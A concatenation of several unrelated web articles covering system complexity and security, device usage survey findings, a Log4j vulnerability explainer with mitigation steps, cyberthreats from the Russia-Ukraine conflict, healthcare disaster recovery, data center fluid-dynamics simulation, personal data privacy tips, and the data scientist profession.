Humans are good at keeping simple constructs in their minds and understanding them. When the size and complexity of a system increases the human developer must break it down into simpler pieces that can then be understood at once. And relationships must be abstracted and reduced to easily understood assemblies. When a system is large and complex the number of possible relationships tends to grow faster than linear, and the number of possible paths in the system grows exponentially. Thus the system quickly becomes unwieldy to the human developer as the size and complexity grows.
The size and complexity of a system directly results in a greater number of defects and resulting vulnerabilities as these quantities grow. On the other hand, the number of defects and cybersecurity vulnerabilities shrinks as the system or component is made smaller and simpler. This strongly suggests that designs and implementations that are small and simple should be very much favored over large and complex if effective cybersecurity is to be obtained.
The article was written by David W. Viel, Ph.D., the founder and CEO of Cognoscenti Systems, LLC. He has extensive experience in research and development of mission critical systems in a wide variety of fields including military control systems, space, modeling and simulation, computer languages, telecommunications, and distributed systems. He also has led a number of teams in the development mission critical systems. First the article was published here. | <urn:uuid:b8064b26-f0e8-46d1-a4b3-f30441628b9d> | CC-MAIN-2022-40 | https://www.iiot-world.com/ics-security/cybersecurity/size-and-complexity-are-the-enemies-of-cybersecurity/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00541.warc.gz | en | 0.956609 | 726 | 3 | 3 |
Dan Ness, Principal Analyst, MetaFacts, January 11, 2019
People love their smartphones and find more to do with them than PCs or tablets. Around the world, there are few activities done with PCs as regularly as are done with smartphones. Furthermore, there are no activities done more so on tablets than on either smartphones or PCs. Usage profiles vary somewhat by country. Online adults in the U.S. use their connected devices differently than users in many other countries.
These findings are based on the TUP/Technology User Profile 2018 study of 14,273 online adults in the US, UK, Germany, India, and China. Of the more-than 70 activities in the TUP survey tied to each device, we identified those with the widest range of regular use across devices – defined as the difference between the maximum and minimum usage level between smartphone, PC, and tablet users.
The versatility of smartphones is shown by how much more often they’re the device of choice for nearly every type of activity, from shopping to social networking and fun. The range of activity use is as high as 65% – in the case of making and receiving personal phone calls.
Smartphones are being used the most widely for device-unique activities. The four major activities for smartphones – personal phone calls, taking pictures, text messaging, and storing one’s contacts – are infrequently done on a PC or sablet. Although the newest tablets have cameras that approach the quality of those on smartphones, less than a quarter (22%) are being used to take pictures. Also, despite being able to run apps such as WhatsApp or WeChat on Tablets or PCs, phone calls are primarily on smartphones, even while personal video calls have made inroads on non-phone devices.
PCs are mostly being used for email (personal or work), online shopping (bigger screens entice buyers), and online banking. Tablets are mostly being used for social networking and music listening.
There is a small amount of crossover of activity usage across devices. Two of the major activities for smartphones are also leading ones on tablets – adding photos to social media and commenting on other’s images or comments.
American adults use their devices somewhat differently than users in other countries. In addition to personal and work email, PCs are used more often than smartphones or tablets for shopping, banking, finances/accounting, and writing.
Tablets are being used more like PCs than smartphones. The major activities for tablets, although with smaller percentages than PCs, are also among the major activities for PCs. Also, in the US, UK, and Germany, tablets are used more often than either PCs or smartphones for reading a book and making small purchases in person, such as in a coffee shop.
Where PCs dominate
Smartphones aren’t the only connected device users actively use. There are many activities used at a higher rate on PCs than on smartphones are tablets. Sending and checking both personal and work email are high on the list across all of the countries surveyed except for India. Also, writing and managing text documents is a PC-preferred activity except in India. In Germany, writing documents is an especially PC-dominant activity. Also, activities relating to using a printer are strongest when using a PC.
Habits change slowly. Not only do people find effective ways to use connected devices to do what they want, they also show inertia when slowly moving those activities to a different device. Even those users who have multiple devices continue to use the types of devices they had previously for some time before fully embracing a type of device new to them.
Furthermore, there isn’t a single “silver bullet” device that’s preferred for all activities. For some activities, such as reading a book, shopping, or watching television, having a larger display helps. For other activities, such as receiving phone calls or texting, convenience and mobility are key.
We don’t expect the majority of users to concentrate all of their activities on a single device in the near future. Instead, the multi-device experience will continue. PCs may continue to lose their dominance for the many activities they still dominate. Dedicated PC users may just move more of their attention to tablets, especially those focused on passive activities such as social networking or television watching.
The analysis in this TUPdate is based on results drawn from multiple waves of TUP/Technology User Profile, including the 2018 edition which is TUP’s 36th continuous wave.
TUPdates feature analysis of current or essential technology topics. The research results showcase the TUP/Technology User Profile study, MetaFacts’ survey of a representative sample of online adults profiling the full market’s use of technology products and services. The current wave of TUP is TUP/Technology User Profile 2020, which is TUP’s 38th annual. TUPdates may also include results from previous waves of TUP.
Current subscribers may use the comprehensive TUP datasets to obtain even more results or tailor these results to fit their chosen segments, services, or products. As subscribers choose, they may use the TUP inquiry service, online interactive tools, or analysis previously published by MetaFacts.
On request, interested research professionals can receive complimentary updates through our periodic newsletter. These include MetaFAQs – brief answers to frequently asked questions about technology users – or TUPdates – analysis of current and essential technology industry topics. To subscribe, contact MetaFacts. | <urn:uuid:e3fb9862-a152-40d7-ad73-097f7386542e> | CC-MAIN-2022-40 | https://metafacts.com/how-and-where-pcs-and-tablets-are-used-differently-than-smartphones-tupdate/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00741.warc.gz | en | 0.951394 | 1,133 | 2.546875 | 3 |
News of a widespread security exploit within the Log4j internet software (also called Log4shell) sent IT and security teams into emergency mode earlier this week. With lots of information swirling around, BARR associates came together to compile the most important details you need to know about this software flaw.
What is Log4j?
Log4j is a free framework distributed by the Apache Software Foundation that has millions of downloads across the globe, all of which collect data from things like computer networks, apps, and websites.
“The best way to describe Log4j is a Java library used for logging error messages,” said Brett Davis, senior consultant, cyber risk advisory at BARR. “The Log4j vulnerability allows for remote code execution by input of a textbox.”
So what are the risks?
Already considered one of the most serious software flaws in recent times, the Log4j vulnerability leaves the door wide open to cybercriminals who can input code remotely on a target device. Doing this means the hacker can install malware, steal data, and even hijack the device by taking total control of it. There is also a concern criminals could install ransomware which locks systems and data until a payment is made to the hacker.
“It’s interesting because, beyond the technical risks associated with exploiting the vulnerability, the risks are exacerbated by poor asset management and dependency tracking within supporting infrastructures,” said Larry Kinkaid, senior consultant, CISO advisory. “It also reveals gaps related to third party risk management such as relationship responsibilities, lack of primary contact information, tracking the sensitivity of data and information the vendor may store or process, and how shared responsibilities are defined.”
The flaw was first discovered within Minecraft, but security experts quickly realized the vulnerability extended to every program using the Log4j library. See GitHub’s list of all the affected software here.
Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA) who has spent 20 years in various federal cybersecurity roles, released a statement saying, “To be clear, this vulnerability poses a severe risk.” In the statement, Easterly urges companies to act fast, adding, “we have limited time to take necessary steps in order to reduce the likelihood of damage.”
What can you do to protect your organization?
Here are some recommendations from Niti Jadhav, senior consultant, cyber risk advisory, on what you can do to mitigate risk:
- Identify all potentially vulnerable systems at risk.
- Upgrade devices utilizing Log4j to version 2.15.0 where possible. If not possible, apply these recommended steps.
- Apply patches from vendors as soon as they become available (e.g., AWS’s released mitigations and planned platches).
- Install and configure web application firewall (WAF) rules to focus on Log4j threat detection.
- Utilize monitoring tools to detect and log exploitation attempts.
- Utilize continuous vulnerability scanning to identify vulnerabilities in systems.
For more information on how you can fix the Log4j problem within your organization, we recommend reading this article from the Wall Street Journal.
Still have concerns, questions, or are unsure how to take steps to protect your company? Don’t hesitate to contact us. | <urn:uuid:e7c1e1d6-dc61-43fb-a72c-6e51e4a72fcd> | CC-MAIN-2022-40 | https://www.barradvisory.com/blog/log4j/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00741.warc.gz | en | 0.923509 | 692 | 2.828125 | 3 |
As the Russian-Ukraine war reaches global cyberspace, everyone should be on high alert. State-sponsored hackers may attempt to steal sensitive information or sabotage critical systems to further their political agenda. While Ukraine is a primary target for these threats, many security experts believe that Russian-linked hackers will also set their sights on countries that have imposed heavy sanctions, like the United States. This means American organizations need to be prepared for a new wave of cyberthreats.
What are the biggest cyberthreats to watch out for?
It’s highly likely that US businesses will get caught in the crossfire in the cyberwarfare between Russia and Ukraine. Here are the major cyberthreats that can potentially affect US organizations:
1. Distributed denial-of-service (DDoS)
A DDoS attack is a type of cyberattack that floods a target website or server with traffic from multiple sources, causing it to crash and become unusable. In fact, Russian-linked hacking groups used DDoS to relentlessly attack Ukrainian government websites and critical institutions. While Ukraine fended off most of these attacks, there’s a possibility that Russian DDoS threats will start coming after Western nations that have imposed hefty sanctions over the conflict.
If Russian-linked hackers target unsecured networks today, they could potentially shut down critical infrastructure and further disrupt supply chains all over the US. Businesses who suffer a DDoS attack may also face catastrophic financial damages.
Ransomware is a type of malware that encrypts files or systems and prevents users from accessing them until they pay a ransom. In 2021, a Russian-linked hacking group purportedly used ransomware to shut down Colonial Pipeline, halting fuel transportation across the US East Coast. Considering the disruption and damage this ransomware attack caused, state-sponsored cybercriminals may leverage increasingly sophisticated ransomware variants to target vulnerable US businesses. Some modern-day ransomware are even designed to steal data when a system is locked down.
3. Phishing scams
The frequency of phishing scams often increases during times of heightened political tensions. In this case, hackers may develop phishing campaigns capitalizing on the Russia-Ukraine conflict. Google, in particular, has discovered various phishing campaigns designed to steal login credentials by tricking users to go to a fake login web page. Experts also predict that donation-themed phishing scams that exploit people’s goodwill will become more common during the crisis. Hackers can use these scams to not only steal money directly from unwitting users, but also to install malicious software on their victims’ devices.
4. Remote code execution
Remote code execution is a type of attack that allows hackers to run malicious code on a vulnerable system. To initiate the attack, a hacker must gain unfettered access to a company's network. They typically do this by exploiting an unpatched vulnerability in a web application or operating system. From there, they can infect the network with malware or remain dormant in the system while stealing sensitive information. In fact, the federal Cybersecurity and Infrastructure Security Agency (CISA) is warning US organizations of 95 new vulnerabilities that would enable widespread remote code execution attacks, as per our previous social media video posted on March 29th. If companies fail to install the latest security updates, they could be the next victim caught between the Russia-Ukraine cyberconflict.
5. Disinformation and cybervandalism
According to recent reports, Ukrainian security experts have found several bot farms using over 100,000 fake social media accounts to disseminate false information. The purpose of these bot farms is to sow discord and confusion among the public. While disinformation isn’t a direct cyberattack, it can still pose a risk to US businesses. Fake news stories targeting specific organizations can destroy reputations, diminish brand equity, and decrease profitability.
How can businesses protect themselves?
The best way to keep your business safe from these types of threats is to establish a comprehensive cybersecurity framework that includes the following components:
- Next-generation firewalls to detect and prevent malicious internet traffic from infiltrating your company network
- Endpoint security solutions to protect devices from malware infection
- Vulnerability assessments to identify and patch insecure systems
- Data backup solutions to keep critical data intact in the event of a cyberattack
- Security awareness training for employees to help them spot phishing emails and other social engineering attacks
Safeguarding your business from a slew of cyberthreats during the Russia-Ukraine crisis can be incredibly taxing, but you don’t have to do it alone. Healthy IT is a leading managed IT services provider that can protect your business with world-class security solutions and expertise. Call us today to mitigate cybersecurity risks. | <urn:uuid:b730e8ea-b31f-4412-9249-e012d182fc85> | CC-MAIN-2022-40 | https://www.myhealthyit.com/russia-ukraine-conflict-exposes-us-businesses-to-cybersecurity-risks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030333541.98/warc/CC-MAIN-20220924213650-20220925003650-00741.warc.gz | en | 0.91866 | 960 | 2.71875 | 3 |
Today, almost every critical human process depends on automation and electronic data. Hospitals and medical facilities have changed over to this trend with Electronic Health Records (EHR) forming a core aspect of modern day healthcare. With large data accumulating in the form of medical records and other hospital data, it is critical that healthcare centers should also have disaster recovery plan.
A data center outage in such a critical environment could potentially damage the lives of hundreds of patients. Hospitals must ensure that their service networks are reliable and always online. Why? Because these systems form the core onto which several medical equipments and patient data link to. There are several clinical applications that generate crucial data that must be protected at all costs. In fact, a disaster will affect every part of your business – from patient billing and lab work to personnel and purchasing.
To begin with, the hospital authorities should consult with the IT department and HR to discuss about the possible impact zones of a disaster. They should understand how each application is relevant to their business and how its outage could affect the operations of the center. The next step is to find out which sections are more vulnerable to outages. Suitable precautions and solutions to address these critical areas must be planned.
Finally, these critical services must have a remote access to the data back up and replication storage facilities so that in the event of a failure, these services do not go down. | <urn:uuid:114c2f2c-ac23-40ac-b862-e3be037dde0a> | CC-MAIN-2022-40 | https://lifelinedatacenters.com/data-center/disaster-recovery-in-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00741.warc.gz | en | 0.956416 | 281 | 2.65625 | 3 |
According to a recent Frost & Sullivan market research analysis, the data center market would be worth $432.14 billion per year by 2025. This is up from $244.74 billion in 2019, indicating a 10% annual growth rate. Datacenter operators, builders, and designers will expand their investment to leverage the deployment and use of IoT, Big Data, and AI. Emerging economies are predicted to grow rapidly, with the Asia-Pacific area leading the way. DatacenterComputational Fluid Dynamics analysis can help meet green data center targets while expanding their capacity.
This involves making energy and resource efficiency a top concern when developing and operating data centers. A slight boost in overall system efficiency can boost a data center asset’s return on investment significantly. Data centers have traditionally been extremely energy-intensive, with the majority of cooling provided by electricity-hungry chillers and other related equipment. The use of natural heat sinks such as the surrounding air or a water supply has become increasingly popular in recent years. To reduce energy demands for thermal management, many data centers have been built in cooler climes, and some net-zero data center operations even transfer extra heat to meet adjacent heat demands. Many data centers have been built in cooler areas to reduce energy demands for thermal management, and some net-zero data center operations even transfer extra heat to fulfill adjacent heat demands, such as houses and offices.
Driven By Simulation
More precise simulation models of how the system operates have enabled current advances in more energy-efficient data centers. The major energy and environmental aspects of a given design can be captured through simulation and modeling of a data center building, equipment, and operation. The performance of this model is then predicted in the real world by simulating it against a set of climate and other variables. Designers can use simulation tools to undertake several design iterations and determine a building’s rigorous and physics-based probabilistic performance. This necessitates the use of analysis software that takes into consideration the physics of heat transport, cooling, ventilation, and other product and material qualities. A fundamental benefit of modeling is options analysis at an early stage of design to swiftly examine multiple designs before the design gets too intricate and impossible to change. A sort of study performed by engineers to analyze and simulate the performance of data centers is engineering simulation.
Engineering Simulation On The Cloud
Photo Credit: blogspot.com
Computational Fluid Dynamics (CFD) is a sort of engineering simulation that simulates the behavior of fluids. To mimic the physical and thermal parameters of a data center setup, for example, a 3D model of a data center is employed. Computational Fluid Dynamics (CFD) can simulate the basic heat transfer mechanisms — conduction, convection, and radiation — and show how they affect the thermal performance of any building or piece of equipment. The approach is made possible by a cloud-based data center CFD simulation platform that can execute several simulations at the same time. This cuts down on the time it takes to thoroughly investigate all of the necessary scenarios within a problem domain, which can number in the hundreds. All conceivable design situations can be simulated at the same time using parallel run capabilities. Computational Fluid Dynamics CFD is helpful in gaining a better understanding of:
Existing designs’ flow characteristics expose inefficiencies. Recirculation and isolation zones between aisles, or CRAC units, for example.
Temperature distribution across different sites.
The temperature of the equipment.
Zones or hotspots are identified.
What-if scenarios and design tweaks are compared.
Computational Fluid Dynamics (CFD) Simulation Best Practices
Several publications on Computational Fluid Dynamics (CFD) Simulation Best Practices have been published in recent years. These suggestions are usually aimed toward CFD simulation analysts with complete control over mesh production and solver options. Nonetheless, users of application-specific software should be aware of a few best practices that will help them succeed. Here’s a quick rundown:
Make Sure Your Setup Is Correct
The need to press the simulate button is understandable. Remember, that considerable simulation power comes with great responsibility. Make sure that geometry, mesh, and initial/boundary conditions are correct, and that your setup is physically and numerically sound. You’ll save a lot of time if you can avoid these early setup mistakes.
Gradually Increase The Level Of Complexity
Breaking down your problem into manageable chunks and gradually increasing simulation complexity is generally beneficial.
Another issue to evaluate is the physical models’ relevance. While it’s understandable to want to get as near to reality as possible, will activating surface tension be feasible when simulating a tens-of-kilometer-long river flow problem?
Make the Most of Your Monitoring Software
Even before you start conducting simulations, you can start optimizing your system. It’s critical to understand how to make the most of the capabilities included in your Computational Fluid Dynamics (CFD) program. Many simulation software packages include built-in features to assist you in diagnosing and improving your simulations on the fly. The simulation monitor gives you useful information on convergence, performance, numerics, and flow characteristics, while the runtime options let you customize your simulation as it runs. When things start to go wrong, keep in mind that these characteristics can save the day.
Enlist The Help of the Experts
Software support exists for a purpose, and any competent Computational Fluid Dynamics (CFD) firm should have a strong support organization. Support engineers are well-versed in the program and can spot obvious flaws or provide innovative solutions to any issues you may be experiencing. They can provide insights into your challenges and provide you with better ways to tackle them because they’ve seen a wide range of applications.
Allow it to be alone
Then sit back, unwind, and quit fiddling with your simulation. Looking at your simulation output actually modifies the findings, which is a little-known truth.
Benefits of data center Computational Fluid Dynamics Simulation
As fans age, or fail, the airflow over the IT equipment will lessen. This leads to higher temperature differentials between the front and rear.
Insufficient Pressure Differential To Pull Air Through The Cabinet
When there is an insufficient pressure differential between the front and rear of the cabinet, airflow will be less. The less cold air flowing through the cabinet, the higher the temperature differential front to rear will become.
Power Usage Effectiveness (PUE)
When the data is combined with the power consumption from the in-line power meter you can safely make adjustments in the data center cooling systems, without compromising your equipment, while instantly seeing the changes in your PUE numbers.
ACKP Sensors And Central Monitoring
Wired and Wireless Thermal Map Sensors
Cabinet Analysis and Thermal Map Sensors
Sensors placed in the room or on individual cabinets have traditionally monitored the temperature and humidity within data centers. The Thermal Map sensor, wired or wireless, is a three-in-one sensor that monitors temperature and humidity at the top, middle, and bottom of your server cabinet. Designed to be installed at the rack’s front air inlet, with a second sensor installed at the back air outlet.
AKCPro Server is our world-class central monitoring and management software. Suitable for a wide range of monitoring applications. Free to use for all AKCP devices. Monitor your infrastructure, whether it be a single building or remote sites over a wide geographic area. Integrate third-party devices with, Modbus, SNMP, and ONVIF compatible IP cameras.
Monitor all your AKCP devices
All deployed AKCP base units and attached sensors can be configured and monitored from AKCPro Server (APS). Base units communicate with the server through your wired local network (LAN) or wide area network (WAN). Remote sites with no wired network send data to the server through the cellular data network via a VPN connection.
Engineers can use Computational Fluid Dynamics (CFD) simulation to swiftly model a variety of data center architecture configurations. More significantly, it enables a designer to correctly assess the data center’s thermal, airflow, layout, and equipment performance. Correctly defined models and engineering simulation software are powerful tools in the design of future data centers because accurately anticipating a system’s performance gives critical information that feeds into financial considerations such as return on investment and payback.
HVAC Assist, New Zealand, recently completed another installation utilizing the AKCP SP2+ and sensors for monitoring chillers in HVAC systems. In this project, the chiller was recently replaced and a new switchboard installed. The system had an older analogue control system for the central plant, so the SP2+ was deployed to add some intelligence and remote monitoring capabilities to the installation. | <urn:uuid:0df0c4da-4b4b-4b0b-8f67-977a97de5229> | CC-MAIN-2022-40 | https://www.akcp.com/articles/how-computational-fluid-dynamics-simulation-helps-data-center-design/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00741.warc.gz | en | 0.906327 | 1,822 | 2.703125 | 3 |
Personal data privacy IS a part of our everyday life
Last month, I started shopping for a new refrigerator. Why? Because my kids slam the doors on our current one, causing one or both to bounce back open slightly. This has led to prematurely spoiled milk and a freezer full of semi-defrosted food on more than one occasion. Ugh.
As I was browsing online, I was impressed by how far home appliance technology has come.
Your fridge can pretty much replace your iPad. Who couldn’t use a giant Tesla-sized touchscreen built right into the door? What about an integrated webcam that allows you to peek inside your fridge from the grocery store aisle?
It got me thinking about what other kinds of internet-connected tech the average family has in their home. How much sensitive data do those devices collect, store and share about themselves–and your loved ones? And what do companies do with your information?
Today, January 28th is Data Privacy Day, a day dedicated to raising awareness amongst business owners and promoting privacy and data protection best practices. Since it started in 2007, the focus of DPD has also expanded to include education for families and consumers about how to protect their personally identifiable information online and in social networking.
A topic of hot discussion lately is how tech giants like Facebook, Google, and Apple protect our PII–and how they are monetizing that sensitive and private data for their benefit (but not ours). New privacy regulations are likely on the horizon, but it may be a very long time before we see any meaningful reforms.
So we wait. But not idly.
Unfortunately, our personal data is less private than we think. We can and should take steps to minimize what others can find about us online. By taking action now, we can stop the bleeding of private data to 3rd parties, and even begin to clean-up what is already out there about us.
Follow the steps later in this guide to fairly quickly and easily:
- Lockdown your sensitive data
- Secure your internet communications
- Limit what information is collected about you online
- Limit the sharing of personal data with 3rd parties
- Opt-out of targeted advertising
- Remove personally identifiable information (PII) from public records
If you don’t take these actions to secure your data privacy, you’re at an increased risk of identity theft, surveillance, and eavesdropping. Nowadays, private conversations can be recorded by voice assistants. Webcams can be hacked and used as spies or for blackmail. And emails and login details can be leaked in data breaches and reused by 3rd party attackers.
You might be wondering, if the security and data privacy risks are so great if we get this wrong, then why isn’t all of our secure data locked down by default?
And the answer is that as a society, we’ve traded our privacy for convenience. Today’s cloud-enabled apps, voice assistants, and smart homes all present an irresistible value proposition. The promise of speed, convenience, and easy access to information. The automation of mundane tasks and getting fast answers to complex questions.
But to make these services work effectively, they need to know a lot about us so they can tailor our experience. For example, how to distinguish your voice from that of your significant other, or kids. Where you live, work, eat and shop so it can make intelligent recommendations. What’s your schedule, habits, and preferences so it can predict what you might need. All down to the details like how warm you like to keep your house. How cold you like to keep your milk, and so on.
The more cloud services and websites know about you, and other users like you, the better they get at predicting new behaviors. Predictive AI is an advertiser’s gold mine. If they know what you like, and can predict what you might do (click an ad, start a trial), they know exactly what to serve you to trigger a purchase. Facebook ads are a great example. The reason they’re so effective and powerful is that they’re so finely tuned and targeted based on hoards of personal data.
In our daily lives, each of us has to decide where to strike the right balance between convenience and privacy. It’s a personal decision. The best advice we can give is to carefully consider the tradeoffs before you hand over any personal information. Make sure the juice is worth the squeeze.
Where to start with data privacy
It’s smart to take a good long look at what you’re doing today that might be unknowingly sabotaging your privacy. For my action-oriented friends out there, does this sound like you?
- You breeze through the setup menu when installing new software, clicking ‘Accept’ on every screen.
- You install new mobile apps often, without a 2nd thought about the permissions the app asks for (e.g. location, contacts, microphone access, or the ability to “read and change data privacy settings on your screen”).
- You’ve got tons of old accounts with websites you don’t use anymore.
- Speed, convenience, and ease are paramount. Your focus is on getting things done right now, and you don’t worry much about what may or may not happen later.
If you said yes to any of these, start with the following:
- When installing software, if given an option, DON’T grant permission to “send anonymous [device, user and/or performance] personal data to help us improve our products and services”. This is often a step in the software installation wizard, or an admin setting you can disable from the app’s settings menu once installed.
- Remember that anonymous data isn’t ever totally anonymous. Even though a company may claim that the data they gather about you is de-personalized or anonymized, with enough attention and skill, it can usually be cross-matched with other data sets such as location, IP address, etc. to infer who you are.
- Review app permissions before downloading. Ensure they are reasonable, and limited to the lowest level possible that allows the app to function. For example, if a mobile restaurant app needs your current location to show you nearby restaurants, can you limit the access to “Share my location only while using the app”? Or deny location data access altogether, and instead type in your zip code or pinch & zoom on a map to find nearby restaurants? Be very careful with apps that need to access your device’s storage, microphone, camera, or need the ability to “read and change data on your screen”.
The less information is stored about you online, including on sites you no longer use, the lower your chances are of having data privacy exposed in a breach or sold to sensitive data brokers or advertisers.
When installing apps, make sure any high-risk permissions requested are required and reasonable for the app to work; and that the app fulfills an important enough role for you that it’s worth the extra privacy and security risks.
But what if I already do all that?
Now, if you’re like me and consider yourself a fairly careful and detail-oriented person, you might be thinking you’re less at risk because:
- You actually read contracts before signing them.
- You also read the fine print, even though it’s sometimes confusing and full of jargon.
- You’re cautious about what you say and do online, because you know digital is forever, and don’t want to be a front-page headline.
- You care about the ethics and morality of the companies you do business with.
But we can ALWAYS step up our game. Here are a few examples to take it to the next level:
- Never blindly accept cookies on websites. Always see which you can opt-out of (ex: advertising or performance cookies) by clicking to learn more and unchecking available options.
- Take security and privacy checkups on key sites that offer them. According to Financial Times, less than 10% of Google users, and probably closer to 1%, actually change their privacy settings. If you have a Google account, I recommend their Privacy Checkup Wizard and would encourage you to use it. Facebook, LinkedIn, Dropbox, Microsoft, and others also offer simple guides that walk you through privacy settings and make it easy to toggle them on and off.
- Remember that software is created by humans, and humans are not perfect. Even if a site claims to not sell or share your personal data, or use it for any purpose other than delivering the products and services you requested—there can be human errors, software bugs, or hacks that allow private data to inadvertently be shared with outside parties. It’s why it’s a good idea not to store payment information or other sensitive data on a website, but instead to keep it handy by storing that data securely in a password manager.
This all sounds complicated. How do I make protecting data privacy easy?
Most of what we’ve covered so far are behavioral changes that can help you limit what private data is gathered or shared about you, and minimize the potential harm or hassle it can cause. But all of these require an investment of time and effort on your part and let’s face it, we’re all really busy. Here are a few quick actions and simple tools that will help secure your communications.
First and foremost, use common sense.
If you’re worried about whether your Alexa device is spying on you, mute your microphone and cover the camera. Invest in a couple of laptop webcam covers (or comment below and we’ll mail you some!), and don’t be afraid to unplug or power down devices if you even suspect they might be compromised. When you install new devices like a network router, always change default passwords and review the security settings menu to dial up your protections.
Use a Personal VPN service.
A VPN is a virtual private network that encrypts all internet communication to and from your devices and the online services you use. VPNs prevent hackers and 3rd parties from spying on you while connected to public or untrusted Wi-Fi and ensure your web traffic can’t be intercepted or manipulated by others. While we don’t resell VPN services directly, we do have a relationship with ExpressVPN, and you can learn more about their services and pricing here.
Protect all your internet-connected devices with a smart firewall and WiFi mesh system.
Today’s homes are full of dumb “smart” things. Unlike computers which run very sophisticated operating systems, voice assistants, doorbell cameras, and internet-connected appliances are all comparatively “dumb”. There’s often a very basic user interface, and no capacity to run any kind of antivirus software or manage data privacy, data collection, or user permissions.
These devices generally function by receiving and relaying commands to and from the vendor’s central cloud servers. And because they can be remotely told what do to, they are highly susceptible to remote takeover attempts by rogue devices on the internet.
Your best approach to keep them clean and safe is to put them behind a network firewall that can screen and block rogue connection requests. A smart firewall from eSilo is one way to get this type of protection for everything inside your home, with a simple plug-n-play setup. Each device also comes with a subscription for remote security monitoring services.
Lastly, train your family and staff on good data security practices.
It’s easy to forget how critical our “human firewall” is to avoiding cyberattacks and privacy breaches. The more they know, the smarter they’ll be. It’s always a good idea to do annual security awareness training, and then reinforce that learning with short explainer videos. We’re offering free access to eSilo’s video training platform, where you can find over 20 1-minute videos on a variety of security, privacy, and online safety topics. You can create an account for FREE here.
Looking back over the past 5 to 10 years, it’s amazing how much new technology we’ve added into our homes and can now carry around in our pockets. But it’s also a little worrisome. The average person knows so little about how to protect their personal data security, and what the companies who provide this tech do to protect their privacy.
Every time we create an online account, download an app or install a piece of software, we’re giving away little bits of information about ourselves. Those bits add up over time and can be stitched together to create a frighteningly accurate picture of who we are, what we do, why we buy, and how we think and act. This is why data brokers make so much money gathering and selling our personal data.
But the good news is that the situation is far from hopeless. The more we collectively understand how our private data is gathered and used, and consciously decide what we are and aren’t comfortable with, the easier it becomes to lockdown the things we don’t like, and to walk away from vendors who can’t, or choose not to, handle our data securely. | <urn:uuid:150e6b83-cc79-48b9-9b7a-3ef7d14bda61> | CC-MAIN-2022-40 | https://www.esilo.com/blog/personal-data-privacy/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00741.warc.gz | en | 0.924775 | 3,025 | 2.671875 | 3 |
International time coordination is improving throughout the Americas, thanks to a low-cost system relying on GPS satellites and the Internet, which enables much faster time comparisons and gives small countries the opportunity to evaluate easily their measurements in relation to others and to world standards, according to the National Institute of Standards and Technology (NIST).
The time and frequency network of the Sistema Interamericano de Metrologia (SIM), or Inter-American Metrology System, began operation in 2005. The system includes national metrology institutes in member nations of the Organization of American States (OAS). The SIM network currently compares time and frequency measurements made in Brazil, Canada, Mexico, Panama and the United States. Costa Rica and Columbia are expected to join the network soon, says the NIST statement, and additional OAS members have expressed interest.
As the U.S. civilian timekeeper, the NIST participates in the SIM network and also calibrates other members’ equipment, which consists of a computer-based measurement system and a GPS receiver provided by OAS. Institutes simultaneously compare their time scales to clocks on the same GPS satellites, and then automatically compare their results over the Internet. Time differences can be viewed on the Web by all laboratories in the network, with updates every 10 minutes.
“Canada, Mexico and the United States now have better time coordination than ever before,” said Mike Lombardi, an NIST scientist who is a member of the SIM working group on time and frequency. The three countries’ times remained within 50 nanoseconds of each other for an eight-month period in 2006, according to a recent status report, claim NIST officials. Measurement precision is good enough to calibrate the best regional standards.
Check out our CIO News Alerts and Tech Informer pages for more updated news coverage. | <urn:uuid:597f2014-c59f-433e-8e8e-01e792beb474> | CC-MAIN-2022-40 | https://www.cio.com/article/264934/mobile-just-in-time-improving-international-time-coordination-with-gps-and-the-internet.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00741.warc.gz | en | 0.924123 | 376 | 2.6875 | 3 |
The Science behind Big Data
Every day, the amount of information available to solve some of society’s most vexing problems grows exponentially. By 2020, the amount of data in the digital universe will grow ten-fold.
"Big Data only becomes truly powerful when it is compiled, sorted, analyzed and manipulated -when it is translated into the language of business leaders and policymakers"
But for all its potential, data alone won’t change the way we distribute innovations, administer healthcare, conduct business or operate in the global economy. Data in its raw form is nothing but untapped potential.
Big Data only becomes truly powerful when it is compiled, sorted, analyzed and manipulated when it is translated into the language of business leaders and policymakers. And so the explosion of data has driven the emergence of fields built for the sole purpose of making data usable.
Today, we see entire disciplines and areas of business that have been born of the need to glean insights from vast amounts of, otherwise, indecipherable information. In particular, a new profession of Data Scientists has emerged to meet this growing need to bring structure to large quantities of formless data.
The job is still in its relative infancy the term “Data Scientist” was first coined in 2008 by the leaders of data analytics at LinkedIn and Facebook but even so, in seven short years the profession has exploded.
In 2012, Harvard Business Review named the position, “the sexiest job of the 21st century.” This year it was Mashable’s hottest profession. With acknowledgments like that it should come as no surprise that students with Masters degrees of PhDs, but no work experience often come out of graduate school and receive six figure salaries. Experienced data scientists are commonly paid similarly to senior business executives.
Those salaries aren’t without warrant. Data science is now an essential business tool. According to recent research from Accenture, 87 percent of companies agree. They believe that within three years, big data analytics will redefine their respective industries and are spending on it, accordingly. In fact, 73 percent of enterprises are spending more than a fifth of their technology budget on analytics.
Moreover, there is shortage of qualified scientists to fill this growing demand. Companies are finding themselves expanding the search for talent to physics majors, engineering and applied mathematics, but that requires significant testing and screening to ensure they can adapt to the rigorous requirements of the data science field.
But why exactly does a Data Scientist need these skills? What exactly does a Data Scientist do? And what sets this profession apart from the more established mathematicians and statisticians?
The big difference is a Data Scientists’ ability to think like a business person they not only parse through vast and varied banks of data, but relay findings clearly to decision makers. As the industry defines it, data scientists have “the ability to communicate findings to business and IT leaders in a way that can influence how organizations approach business challenges.”
Another big difference is the number of highly technical and quantitative skills needed to be successful. There is the highest demand for machine learning skills, Python and Java development skills, open source analytics and data management.
